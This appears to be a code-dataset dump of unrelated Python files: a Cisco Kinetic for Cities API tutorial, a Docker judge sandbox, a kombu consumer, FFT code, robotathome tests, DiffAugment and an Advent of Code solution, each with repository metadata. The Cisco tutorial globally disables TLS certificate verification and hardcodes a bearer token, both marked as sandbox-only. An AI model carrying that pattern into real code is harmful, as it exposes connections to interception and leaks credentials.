| 29.652174 | 93 | 0.678886 | 121 | 682 | 3.68595 | 0.561983 | 0.121076 | 0.053812 | 0.035874 | 0.09417 | 0.09417 | 0.09417 | 0.09417 | 0.09417 | 0.09417 | 0 | 0.127622 | 0.16129 | 682 | 22 | 94 | 31 | 0.652098 | 0.313783 | 0 | 0 | 0 | 0 | 0.175055 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.111111 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e7b99b3286e2086dc64ba2272a4da8ef40cb9cf | 2,573 | py | Python | CKC102_python_example.py | sagenew/scc-ckc-api-examples | fd86e435877cf68f35d01b8314a47a08b83eb391 | [
"MIT"
] | null | null | null | CKC102_python_example.py | sagenew/scc-ckc-api-examples | fd86e435877cf68f35d01b8314a47a08b83eb391 | [
"MIT"
] | null | null | null | CKC102_python_example.py | sagenew/scc-ckc-api-examples | fd86e435877cf68f35d01b8314a47a08b83eb391 | [
"MIT"
] | null | null | null | import urllib.parse, urllib.request, json, ssl
# Authentication and API Requests
# LEARNING LAB 2 Cisco Kinetic for Cities

# The Initial login steps are the same as Learning Lab 1.
# You can skip ahead to 'LEARNING LAB 2 CODE BEGINS HERE'

# Ignore invalid Certificates — acceptable for the sandbox lab only;
# never disable certificate verification in production code.
ssl._create_default_https_context = ssl._create_unverified_context

# BUG FIX: the original called response.read().decode(encoding) with an
# undefined name `encoding`, raising NameError at runtime.
ENCODING = 'utf-8'

############################### LEARNING LAB 2 CODE BEGINS HERE ############################
#
# In this example, we will exercise the CKC API: {{Platform Instance URL}}/cdp/v1/locations/user/{userId}/info
# In the case of the Sandbox lab, this resolves to https://ckcsandbox.cisco.com/t/devnet.com/cdp/v1/locations/user/{userId}/info
# The access_token and user_id from Learning Lab 1 will be used to obtain the current Users Location Information

print('Learning Lab 2 Starts Here:')
user_id = '86847897-ab35-489c-af17-6fbf301a6016'
access_token = '0f493c98-9689-37c4-ad76-b957020d0d6c'

# Define the required GET Headers needed by the CKC API
headers = {
    'authorization': "Bearer " + access_token,
    'Content-Type': "application/json"
}

# The URL with queryParms to request user details
requestUrl = 'https://ckcsandbox.cisco.com/t/devnet.com/cdp/v1/locations/user/' + user_id + '/info'
print('\nGetting User Location Info: (' + requestUrl + ')\n')

# create the request
request = urllib.request.Request(requestUrl, headers=headers)
# perform the request
response = urllib.request.urlopen(request)
results = response.read().decode(ENCODING)
responseDictionary = json.loads(results)
print('User Location Info:', results, '\n')

############################### LEARNING LAB 2 PART-2 ############################
#
# In this example, we will exercise the CKC API: {{Platform Instance URL}}/cdp/v1/capabilities/customer
# In the case of the Sandbox lab, this resolves to https://ckcsandbox.cisco.com/t/devnet.com/cdp/v1/capabilities/customer
# The access_token obtained as explained in Learning Lab 1 is used for authorization

# Define the required GET Headers needed by the CKC API
headers = {'authorization': "Bearer " + access_token}

# The URL with queryParms to request user details
requestUrl = 'https://ckcsandbox.cisco.com/t/devnet.com/cdp/v1/capabilities/customer'
print('\nGetting User capabilities: (' + requestUrl + ')\n')

# create the request
request = urllib.request.Request(requestUrl, headers=headers)
# perform the request
response = urllib.request.urlopen(request)
results = response.read().decode(ENCODING)
responseDictionary = json.loads(results)
print('User Capabilities:', results, '\n')
| 37.289855 | 128 | 0.724835 | 350 | 2,573 | 5.285714 | 0.342857 | 0.047568 | 0.032432 | 0.04973 | 0.634054 | 0.634054 | 0.588108 | 0.588108 | 0.588108 | 0.588108 | 0 | 0.027196 | 0.128255 | 2,573 | 68 | 129 | 37.838235 | 0.797593 | 0.465604 | 0 | 0.333333 | 0 | 0.083333 | 0.335223 | 0.0583 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.041667 | 0 | 0.041667 | 0.208333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e7d265dcc13b68469fdea2d8131380b85fbb3c6 | 4,780 | py | Python | judge/machine.py | Means88/judge-backend | 6e998ebb145911e66f8baec6568f007082835a61 | [
"MIT"
] | null | null | null | judge/machine.py | Means88/judge-backend | 6e998ebb145911e66f8baec6568f007082835a61 | [
"MIT"
] | 3 | 2020-06-05T19:21:25.000Z | 2021-06-10T20:54:22.000Z | judge/machine.py | Means88/judge-backend | 6e998ebb145911e66f8baec6568f007082835a61 | [
"MIT"
] | null | null | null | import json
import uuid
import os
import docker
import time
from celery.utils.log import get_task_logger
from config import settings
from .language import LANGUAGE
from .status import ComputingStatus
logger = get_task_logger(__name__)
class Machine:
    """Docker-backed sandbox that runs one judged submission.

    Lifecycle: create() -> start() -> wait_for_computing() (which polls
    container stats to enforce time/memory limits and always destroys the
    container when done).
    """

    # One shared Docker client for all Machine instances.
    client = docker.from_env()

    def __init__(self):
        self.container = None
        self.src_path = None
        self.stdout_path = None
        self.output_path = None
        self.start_time = None  # s
        self.time_limit = None  # ms
        self.memory_limit = None  # byte
        self.uuid = str(uuid.uuid4())
        # Per-run result file; pre-created empty so it can be bind-mounted
        # read-write into the container as /judge/return.
        self.temp_file_path = os.path.join(settings.BASE_DIR, 'tmp', self.uuid + '.log')
        with open(self.temp_file_path, 'w') as f:
            f.write('')
        self.status = ComputingStatus.PENDING

    def create(self, language,
               src_path, stdin_path, output_path, error_path,
               time_limit=1000, memory_limit=256 * 1024 * 1024):
        """Create (but do not start) the judge container.

        Args:
            language: key understood by LANGUAGE helpers.
            src_path/stdin_path/output_path/error_path: host paths mounted
                into the container's /judge directory.
            time_limit: CPU time limit in milliseconds.
            memory_limit: memory limit in bytes.
        Raises:
            Exception: if a container was already created for this machine.
        """
        if self.container:
            raise Exception('Container already exist')
        self.src_path = src_path
        self.output_path = output_path
        self.time_limit = time_limit
        self.memory_limit = memory_limit
        self.container = self.client.containers.create(
            LANGUAGE.get_image_name(language),
            volumes={
                src_path: {'bind': '/judge/{}'.format(LANGUAGE.get_source_name(language)), 'mode': 'ro'},
                stdin_path: {'bind': '/judge/stdin', 'mode': 'ro'},
                # stdout_path: {'bind': '/judge/stdout', 'mode': 'ro'},
                output_path: {'bind': '/judge/userout', 'mode': 'rw'},
                error_path: {'bind': '/judge/usererr', 'mode': 'rw'},
                self.temp_file_path: {'bind': '/judge/return', 'mode': 'rw'}
            },
            # Slight headroom over the judged limit; OOM-kill is disabled so
            # the limit is enforced by our own stats polling instead.
            mem_limit=int(memory_limit / 0.95),
            memswap_limit=int(memory_limit / 0.95),
            oom_kill_disable=True,
        )

    def start(self):
        """Start the container and record the wall-clock start time."""
        self.start_time = time.time()
        self.container.start()

    def stats(self):
        """Return one snapshot of the container's resource statistics."""
        return self.container.stats(decode=True, stream=False)

    def container_status(self):
        """Refresh and return the container's status string (e.g. 'exited')."""
        self.container.reload()
        return self.container.status

    def _wait_for_computing(self):
        """Poll stats until the run finishes or exceeds a limit.

        Returns a dict with status, cpu_usage (ms), memory_usage (bytes),
        an OPEN file handle on the user output (caller must close it) and
        the parsed /judge/return JSON (None if missing/unparseable).
        """
        cpu_usage = 0
        memory_usage = 0
        logger.debug('judge machine compute: %s' % self.src_path)
        logger.debug('time_limit: %s', self.time_limit)
        for stats in self.container.stats(decode=True):
            time_used = time.time() - self.start_time
            # Wall-clock lower bound on CPU usage (ms); stats lag behind.
            cpu_usage = max(cpu_usage, time_used / 2 * 1000)
            logger.debug('time_used: %s', time_used)
            logger.debug('cpu_usage: %s', cpu_usage)
            logger.debug(json.dumps(stats, indent=2, sort_keys=True))
            if self.container_status() == 'exited':
                self.status = ComputingStatus.FINISHED
                break
            # Docker reports total CPU time in nanoseconds; convert to ms.
            cpu_usage = max(cpu_usage, stats['cpu_stats']['cpu_usage']['total_usage'] / 1e6)
            logger.debug('time_limit : %s' % self.time_limit)
            logger.debug('cpu_usage : %s' % cpu_usage)
            memory_usage = max(memory_usage, stats['memory_stats'].get('max_usage', 0))
            if cpu_usage > self.time_limit:
                self.status = ComputingStatus.TIME_LIMIT_EXCEED
                break
            logger.debug('memory_limit: %s' % self.memory_limit)
            logger.debug('memory_usage: %s' % memory_usage)
            if memory_usage >= self.memory_limit:
                self.status = ComputingStatus.MEMORY_LIMIT_EXCEED
                break
            # Hard wall-clock cap at 2x the CPU limit: kill a hung container.
            if time_used > self.time_limit * 2 / 1000:
                self.status = ComputingStatus.TIME_LIMIT_EXCEED
                self.container.stop(timeout=0)
                break
            time.sleep(0.5)
        # FIX: was a bare `except:` around an unclosed open(); narrow to the
        # expected failures (file missing/unreadable, invalid JSON) and close
        # the handle via `with`.  json.JSONDecodeError subclasses ValueError.
        try:
            with open(self.temp_file_path, mode='r') as return_file:
                result = json.load(return_file)
        except (OSError, ValueError):
            result = None
        return {
            'status': self.status,
            'cpu_usage': cpu_usage,
            'memory_usage': memory_usage,
            'output': open(self.output_path, mode='r'),
            'result': result,
        }

    def wait_for_computing(self):
        """Public wrapper: run _wait_for_computing, always destroy the container.

        On any unexpected error, log it and return an ERROR result dict
        instead of raising.
        """
        try:
            return self._wait_for_computing()
        except Exception as e:
            logger.error(e)
            return {
                'status': ComputingStatus.ERROR,
                'cpu_usage': 0,
                'memory_usage': 0,
                'output': None,
                'result': None,
            }
        finally:
            self.destroy()

    def destroy(self):
        """Stop and remove the container, if one exists (idempotent)."""
        if self.container:
            self.container.stop(timeout=0)
            self.container.remove()
            self.container = None
| 32.965517 | 105 | 0.565063 | 549 | 4,780 | 4.703097 | 0.227687 | 0.070488 | 0.030209 | 0.024787 | 0.201394 | 0.112316 | 0.048025 | 0.026336 | 0 | 0 | 0 | 0.013543 | 0.320293 | 4,780 | 144 | 106 | 33.194444 | 0.781163 | 0.017573 | 0 | 0.136752 | 0 | 0 | 0.086354 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.068376 | false | 0 | 0.076923 | 0.008547 | 0.205128 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e7edf92edac4cf5b0a634e3bcb329f30e6b8e66 | 2,160 | py | Python | sources/classic/messaging_kombu/consumer.py | variasov/classic_messaging_kombu | c4191f3d1f788a39f50dc137eca1b67f3ee2af20 | [
"MIT"
] | 1 | 2021-11-12T08:19:53.000Z | 2021-11-12T08:19:53.000Z | sources/classic/messaging_kombu/consumer.py | variasov/classic_messaging_kombu | c4191f3d1f788a39f50dc137eca1b67f3ee2af20 | [
"MIT"
] | null | null | null | sources/classic/messaging_kombu/consumer.py | variasov/classic_messaging_kombu | c4191f3d1f788a39f50dc137eca1b67f3ee2af20 | [
"MIT"
] | null | null | null | from functools import partial
import logging
from typing import Callable, Any, Iterable
from collections import defaultdict
from kombu import Connection
from kombu.mixins import ConsumerMixin
from classic.components import component
from .handlers import MessageHandler, SimpleMessageHandler
from .scheme import BrokerScheme
logger = logging.getLogger(__file__)
AnyCallable = Callable[[Any], None]
@component
class KombuConsumer(ConsumerMixin):
connection: Connection
scheme: BrokerScheme
def __attrs_post_init__(self):
self._handlers = defaultdict(list)
def _get_queues(self, queue_names: Iterable[str]):
queues = []
for name in queue_names:
assert name in self.scheme.queues, \
f'Queue with name {name} do not exists in broker scheme!'
queues.append(self.scheme.queues[name])
return queues
def register_handler(self, handler: MessageHandler, *queue_names: str):
queues = self._get_queues(queue_names)
self._handlers[handler].extend(queues)
def register_function(self,
function: AnyCallable,
*queue_names: str,
late_ack: bool = True):
handler = SimpleMessageHandler(
function=function, late_ack=late_ack,
)
queues = self._get_queues(queue_names)
self._handlers[handler].extend(queues)
def get_consumers(self, consumer_cls, channel):
consumers = []
for handler, queues in self._handlers.items():
on_message = partial(self.on_message, handler=handler)
c = consumer_cls(
queues=queues,
callbacks=[on_message],
)
consumers.append(c)
return consumers
@staticmethod
def on_message(body, message, handler):
try:
logger.info(f'Trying to call {handler}')
handler.handle(message, body)
except Exception as error:
logger.error(error)
def run(self, *args, **kwargs):
logger.info('Worker started')
return super().run(*args, **kwargs)
| 29.589041 | 75 | 0.6375 | 231 | 2,160 | 5.796537 | 0.380952 | 0.04481 | 0.023898 | 0.028379 | 0.0941 | 0.0941 | 0.0941 | 0.0941 | 0.0941 | 0.0941 | 0 | 0 | 0.27963 | 2,160 | 72 | 76 | 30 | 0.86054 | 0 | 0 | 0.071429 | 0 | 0 | 0.042593 | 0 | 0 | 0 | 0 | 0 | 0.017857 | 1 | 0.125 | false | 0 | 0.160714 | 0 | 0.392857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e7ff2193d4240f5f73671b8a5f9d6d5555d5513 | 2,004 | py | Python | du4/du4.py | Honzaik/PocAlgDU | a3d32d1906298ba4bc1627640ecc04370ff4e49c | [
"Unlicense"
] | null | null | null | du4/du4.py | Honzaik/PocAlgDU | a3d32d1906298ba4bc1627640ecc04370ff4e49c | [
"Unlicense"
] | null | null | null | du4/du4.py | Honzaik/PocAlgDU | a3d32d1906298ba4bc1627640ecc04370ff4e49c | [
"Unlicense"
] | null | null | null | from cmath import exp, pi
from math import log2
def vratLiche(a):
oddA = list();
for i in range(len(a)):
if(i % 2 == 1):
oddA.append(a[i])
return oddA
def vratSude(a):
evenA = list()
for i in range(len(a)):
if(i % 2 == 0):
evenA.append(a[i])
return evenA
def roundComplex(vysl): #zaokrouhlování
newVysl = list()
for v in vysl:
a = round(v.real,5)
b = round(v.imag,5)
newVysl.append(complex(a,b))
return newVysl
def recursiveComplexFFT(n, prim, a):
if(n == 1):
return [a[0]]
else:
nHalf = int(n/2)
newPrim = prim*prim
b = recursiveComplexFFT(nHalf, newPrim, vratSude(a))
c = recursiveComplexFFT(nHalf, newPrim, vratLiche(a))
result = [0]*int(n)
for i in range(nHalf):
tempPrim = prim**i
result[i] = b[i]+(tempPrim)*c[i]
result[nHalf+i] = b[i]-(tempPrim)*c[i]
return roundComplex(result)
def rev(i,k): #rev funkce
mask = '{0:0' + str(k) + 'b}'
return int(mask.format(i)[::-1],2)
def iterativeComplexFFT(n, prim, a):
k = int(log2(n))
A = [0]*n
for i in range(n):
A[i] = a[rev(i,k)]
prims = [0]*k
prims[k-1] = prim
for i in range(k-2,-1,-1):
prims[i] = prims[i+1]*prims[i+1]
for u in range(1,k+1,1):
m = 2**u
for i in range(0, n-m+1, m):
for j in range(0,int(m/2),1):
temp = (prims[u-1]**j)*A[i+j+int(m/2)]
v1 = A[i+j] + temp
v2 = A[i+j] - temp
A[i+j] = v1
A[i+j+int(m/2)] = v2
return roundComplex(A)
vektor = [1,1,2,2,5,2,4,7] #pocitani vektor
n = len(vektor)
myPrim = exp((2j*pi)/n) #primitivni odmocnina
res = recursiveComplexFFT(n, myPrim, vektor) #rekurzivni fft
print(res)
myPrim = exp((2j*pi)/n)
res2 = iterativeComplexFFT(n, myPrim, vektor) #iterativni fft
print(res2) | 27.833333 | 65 | 0.510978 | 312 | 2,004 | 3.282051 | 0.237179 | 0.054688 | 0.035156 | 0.064453 | 0.136719 | 0.085938 | 0.044922 | 0.044922 | 0.044922 | 0.044922 | 0 | 0.038405 | 0.324351 | 2,004 | 72 | 66 | 27.833333 | 0.717873 | 0.043912 | 0 | 0.061538 | 0 | 0 | 0.00314 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.092308 | false | 0 | 0.030769 | 0 | 0.230769 | 0.030769 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e85f751c8a5501a2b056c1fde74847efffec00d | 4,147 | py | Python | tests/test_cv.py | goyoambrosio/RobotAtHome2 | 9ab31e5e11d8551b9f6934d90245221449dbbbf4 | [
"MIT"
] | 1 | 2022-03-08T19:00:37.000Z | 2022-03-08T19:00:37.000Z | tests/test_cv.py | goyoambrosio/RobotAtHome2 | 9ab31e5e11d8551b9f6934d90245221449dbbbf4 | [
"MIT"
] | null | null | null | tests/test_cv.py | goyoambrosio/RobotAtHome2 | 9ab31e5e11d8551b9f6934d90245221449dbbbf4 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8; buffer-read-only: t -*-
__author__ = "Gregorio Ambrosio"
__contact__ = "gambrosio[at]uma.es"
__copyright__ = "Copyright 2021, Gregorio Ambrosio"
__date__ = "2021/02/22"
__license__ = "MIT"
import unittest
import os
import sys
import pandas as pd
import matplotlib.pyplot as plt
import robotathome as rh
from robotathome import logger, set_log_level
class Test(unittest.TestCase):
"""Test class of toolbox module """
# @unittest.skip("testing skipping")
def setUp(self):
""" The setUp() method allow you to define instructions that will be
executed before and after each test method
Examples:
python -m unittest <testModule>.<className>.<function_name>
$ cd ~/cloud/GIT/RobotAtHome_API/tests
$ python -m unittest test_reader.Test.test_get_home_names
"""
# we are testing: set the lowest log level
rh.set_log_level('TRACE')
logger.trace("*** Test.setUp")
# Local references
'''
/home/user
└─── WORKSPACE
├─── R@H2-2.0.1
│ └── files
│ ├── rgbd
│ └── scene
└─────── rh.db
'''
self.rh_path = os.path.expanduser('~/WORKSPACE/R@H2-2.0.1')
self.wspc_path = os.path.expanduser('~/WORKSPACE')
self.rgbd_path = os.path.join(self.rh_path, 'files/rgbd')
self.scene_path = os.path.join(self.rh_path, 'files/scene')
self.db_filename = 'rh.db'
try:
self.rh = rh.RobotAtHome(rh_path = self.rh_path,
rgbd_path = self.rgbd_path,
scene_path = self.scene_path,
wspc_path = self.wspc_path,
db_filename = self.db_filename
)
except:
logger.error("setUp: something was wrong")
# exit without handling
os._exit(1)
def tearDown(self):
"""The tearDown() method allow you to define instructions that will be
executed after each test method"""
logger.trace("*** Test.tearDown")
del self.rh
def test_say_hello(self):
"""Testing of say_hello
"""
logger.trace("*** Testing of say_hello()")
logger.info("Running say_hello in _greetings.py")
logger.info(rh.say_hello())
def test_get_labeled_img(self):
"""Testing of get_labeled_img
"""
logger.trace("*** Testing of get_labeled_img()")
logger.info("Getting labeled image")
id = 100000 # 100000 <= id < 200000
[rgb_f, _] = self.rh.get_RGBD_files(id)
labels = self.rh.get_RGBD_labels(id)
[labeled_img, _] = rh.get_labeled_img(labels, rgb_f)
plt.imshow(labeled_img)
plt.show()
def test_plot_labeled_img(self):
"""Testing of plot_labels
"""
logger.trace("*** Testing of plot_labeled_img()")
logger.info("Plotting RGB image patched with labels")
set_log_level('INFO')
id = 100000 # 100000 <= id < 200000
[rgb_f, _] = self.rh.get_RGBD_files(id)
labels = self.rh.get_RGBD_labels(id)
logger.info("\nlabel names: \n{}", labels['name'])
logger.info("\nlabel masks type: \n{}", type(labels['mask'].iat[0]))
rh.plot_labeled_img(labels, rgb_f)
def test_get_scan_xy(self):
""" Docstring
"""
id = 200000 # 0 <= id <= inf
laser_scan = self.rh.get_laser_scan(id)
xy = rh.get_scan_xy(laser_scan)
print(xy)
def test_plot_scan(self):
""" Docstring
"""
id = 200000 # 0 <= id <= inf
laser_scan = self.rh.get_laser_scan(id)
rh.plot_scan(laser_scan)
def test_plot_scene(self):
scenes = self.rh.get_scenes()
s_id = 0
logger.info("\nScene file: \n{}", scenes.iloc[s_id].scene_file)
rh.plot_scene(scenes.iloc[s_id].scene_file)
if __name__ == '__main__':
unittest.main()
| 30.947761 | 78 | 0.564022 | 521 | 4,147 | 4.305182 | 0.318618 | 0.034775 | 0.028087 | 0.023183 | 0.317878 | 0.231832 | 0.187249 | 0.187249 | 0.161391 | 0.161391 | 0 | 0.025965 | 0.312756 | 4,147 | 133 | 79 | 31.180451 | 0.751228 | 0.196528 | 0 | 0.136986 | 0 | 0 | 0.155533 | 0.007311 | 0 | 0 | 0 | 0 | 0 | 1 | 0.109589 | false | 0 | 0.09589 | 0 | 0.219178 | 0.013699 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e8737e7bdcd75430db3502155a2cb8e2ea47372 | 4,483 | py | Python | third_party/DiffAugment_pytorch.py | SuperStar0907/lecam-gan | e502c9b182345ddd03d29edda56b76caa7d8fb41 | [
"Apache-2.0"
] | 135 | 2021-03-23T23:07:47.000Z | 2022-03-30T03:08:42.000Z | third_party/DiffAugment_pytorch.py | SuperStar0907/lecam-gan | e502c9b182345ddd03d29edda56b76caa7d8fb41 | [
"Apache-2.0"
] | 12 | 2021-04-06T16:57:14.000Z | 2021-12-31T07:06:05.000Z | third_party/DiffAugment_pytorch.py | SuperStar0907/lecam-gan | e502c9b182345ddd03d29edda56b76caa7d8fb41 | [
"Apache-2.0"
] | 13 | 2021-03-24T14:37:48.000Z | 2022-03-06T13:24:52.000Z | # Differentiable Augmentation for Data-Efficient GAN Training
# Shengyu Zhao, Zhijian Liu, Ji Lin, Jun-Yan Zhu, and Song Han
# https://arxiv.org/pdf/2006.10738
import torch
import torch.nn.functional as F
from torch.distributions.dirichlet import _Dirichlet
def BetaSample(alpha, beta, sample_shape=torch.Size()):
concentration = torch.stack([alpha, beta], -1)
shape = sample_shape + concentration.shape[:-1] + concentration.shape[-1:]
concentration = concentration.expand(shape)
return _Dirichlet.apply(concentration).select(-1, 0)
def DiffAugment(x, policy='', channels_first=True):
if policy:
x_ori = x.clone()
if not channels_first:
x = x.permute(0, 3, 1, 2)
for p in policy.split(','):
if p in list(AUGMENT_FNS.keys()):
for f in AUGMENT_FNS[p]:
x = f(x)
if not channels_first:
x = x.permute(0, 2, 3, 1)
x = x.contiguous()
# mixup
if 'mixup' in policy:
if not channels_first:
x1 = x_ori.permute(0, 3, 1, 2)
else:
x1 = x_ori.clone()
for p in policy.split(','):
if p in list(AUGMENT_FNS.keys()):
for f in AUGMENT_FNS[p]:
x1 = f(x1)
if not channels_first:
x1 = x1.permute(0, 2, 3, 1)
x1 = x1.contiguous()
#TODO
alpha = torch.ones(x.size(0), 1, 1, 1, dtype=x.dtype, device=x.device)*0.1
beta = torch.ones(x.size(0), 1, 1, 1, dtype=x.dtype, device=x.device)*0.1
weight = BetaSample(alpha, beta)
x = (1 - weight)*x1 + weight*x
'''weight = torch.distributions.beta.Beta(alpha, beta).sample()
weight = torch.max(weight, 1 - weight)
x = (1 - weight)*x_ori + weight*x'''
return x
def rand_brightness(x):
x = x + (torch.rand(x.size(0), 1, 1, 1, dtype=x.dtype, device=x.device) - 0.5)
return x
def rand_saturation(x):
x_mean = x.mean(dim=1, keepdim=True)
x = (x - x_mean) * (torch.rand(x.size(0), 1, 1, 1, dtype=x.dtype, device=x.device) * 2) + x_mean
return x
def rand_contrast(x):
x_mean = x.mean(dim=[1, 2, 3], keepdim=True)
x = (x - x_mean) * (torch.rand(x.size(0), 1, 1, 1, dtype=x.dtype, device=x.device) + 0.5) + x_mean
return x
def rand_translation(x, ratio=0.125):
shift_x, shift_y = int(x.size(2) * ratio + 0.5), int(x.size(3) * ratio + 0.5)
translation_x = torch.randint(-shift_x, shift_x + 1, size=[x.size(0), 1, 1], device=x.device)
translation_y = torch.randint(-shift_y, shift_y + 1, size=[x.size(0), 1, 1], device=x.device)
grid_batch, grid_x, grid_y = torch.meshgrid(
torch.arange(x.size(0), dtype=torch.long, device=x.device),
torch.arange(x.size(2), dtype=torch.long, device=x.device),
torch.arange(x.size(3), dtype=torch.long, device=x.device),
)
grid_x = torch.clamp(grid_x + translation_x + 1, 0, x.size(2) + 1)
grid_y = torch.clamp(grid_y + translation_y + 1, 0, x.size(3) + 1)
x_pad = F.pad(x, [1, 1, 1, 1, 0, 0, 0, 0])
x = x_pad.permute(0, 2, 3, 1).contiguous()[grid_batch, grid_x, grid_y].permute(0, 3, 1, 2)
return x
def rand_cutout(x, ratio=0.5):
cutout_size = int(x.size(2) * ratio + 0.5), int(x.size(3) * ratio + 0.5)
offset_x = torch.randint(0, x.size(2) + (1 - cutout_size[0] % 2), size=[x.size(0), 1, 1], device=x.device)
offset_y = torch.randint(0, x.size(3) + (1 - cutout_size[1] % 2), size=[x.size(0), 1, 1], device=x.device)
grid_batch, grid_x, grid_y = torch.meshgrid(
torch.arange(x.size(0), dtype=torch.long, device=x.device),
torch.arange(cutout_size[0], dtype=torch.long, device=x.device),
torch.arange(cutout_size[1], dtype=torch.long, device=x.device),
)
grid_x = torch.clamp(grid_x + offset_x - cutout_size[0] // 2, min=0, max=x.size(2) - 1)
grid_y = torch.clamp(grid_y + offset_y - cutout_size[1] // 2, min=0, max=x.size(3) - 1)
mask = torch.ones(x.size(0), x.size(2), x.size(3), dtype=x.dtype, device=x.device)
mask[grid_batch, grid_x, grid_y] = 0
x = x * mask.unsqueeze(1)
return x
def noise(x, sd=0.05):
x = x + torch.randn_like(x)*sd*sd
return x
AUGMENT_FNS = {
'color': [rand_brightness, rand_saturation, rand_contrast],
'translation': [rand_translation],
'cutout': [rand_cutout],
'noise': [noise],
}
| 39.672566 | 110 | 0.586438 | 731 | 4,483 | 3.48974 | 0.153215 | 0.05096 | 0.081537 | 0.024696 | 0.519796 | 0.459428 | 0.411995 | 0.400235 | 0.378283 | 0.378283 | 0 | 0.049063 | 0.249833 | 4,483 | 112 | 111 | 40.026786 | 0.709486 | 0.03636 | 0 | 0.244186 | 0 | 0 | 0.008193 | 0 | 0 | 0 | 0 | 0.008929 | 0 | 1 | 0.093023 | false | 0 | 0.034884 | 0 | 0.22093 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e8a1596a6b3ed1679875e09d7a25bdcda290e69 | 3,000 | py | Python | advent_of_code_2021/day4/giant_squid.py | mortendaehli/advent-of-code-2021 | b36959eeff461d1d9eb8bf32c1efc767f6f00b23 | [
"MIT"
] | null | null | null | advent_of_code_2021/day4/giant_squid.py | mortendaehli/advent-of-code-2021 | b36959eeff461d1d9eb8bf32c1efc767f6f00b23 | [
"MIT"
] | null | null | null | advent_of_code_2021/day4/giant_squid.py | mortendaehli/advent-of-code-2021 | b36959eeff461d1d9eb8bf32c1efc767f6f00b23 | [
"MIT"
] | null | null | null | import re
from dataclasses import dataclass
from typing import List, Optional
@dataclass
class PlayBoard:
numbers: List[List[Optional[int]]]
def read_numbers() -> List[int]:
with open("data.txt", "r") as file:
data = file.readline()
return list(map(int, data.split(",")))
def read_boards() -> List[PlayBoard]:
"""
Reading each board defined by a new line then 5 lists of 5 ints.
Given the data format, this divides equally by 6 for possible performant mapping.
"""
with open("data.txt", "r") as file:
data = file.readlines()[2:]
cleaned_data = list(map(lambda x: re.split("\s+", x.strip()), data)) # noqa
play_boards: List[PlayBoard] = list()
for i in range(0, len(data), 6):
play_boards.append(PlayBoard(numbers=[list(map(int, x)) for x in cleaned_data[i : i + 5]]))
return play_boards
def calculate_final_score(play_board: PlayBoard, number: int) -> int:
"""Sum remaining values on the play board."""
return sum([sum([val for val in row if val]) for row in play_board.numbers]) * number
def check_board_and_return_optional_score(play_board: PlayBoard, number: int) -> Optional[int]:
# Check rows
for row_num, row in enumerate(play_board.numbers):
if number in row:
row[row.index(number)] = None
if row == [None] * 5:
final_score = calculate_final_score(play_board=play_board, number=number)
return final_score
# check cols
for n in range(5):
col = [x[n] for x in play_board.numbers]
if col == [None] * 5:
final_score = calculate_final_score(play_board=play_board, number=number)
return final_score
else:
return None
def part_one() -> int:
numbers, play_boards = read_numbers(), read_boards()
game_results = list()
for number in numbers:
for play_board in play_boards:
score = check_board_and_return_optional_score(play_board=play_board, number=number)
if score:
game_results.append(score)
return game_results[0]
def part_two() -> int:
numbers, play_boards = read_numbers(), read_boards()
game_results = list()
for number in numbers:
for play_board in play_boards:
score = check_board_and_return_optional_score(play_board=play_board, number=number)
if score:
game_results.append(score)
return game_results[-1]
if __name__ == "__main__":
print("Day 4: Giant Squid")
print("-" * 80)
result_part_1 = part_one()
print(
f"Part 1: To guarantee victory against the giant squid, figure out which board will win first. "
f"What will your final score be if you choose that board?: {result_part_1}"
)
print("-" * 80)
result_part_2 = part_two()
print(
f"Part 2: Figure out which board will win last. Once it wins, what would its final score be?: {result_part_2}"
)
print("-" * 80)
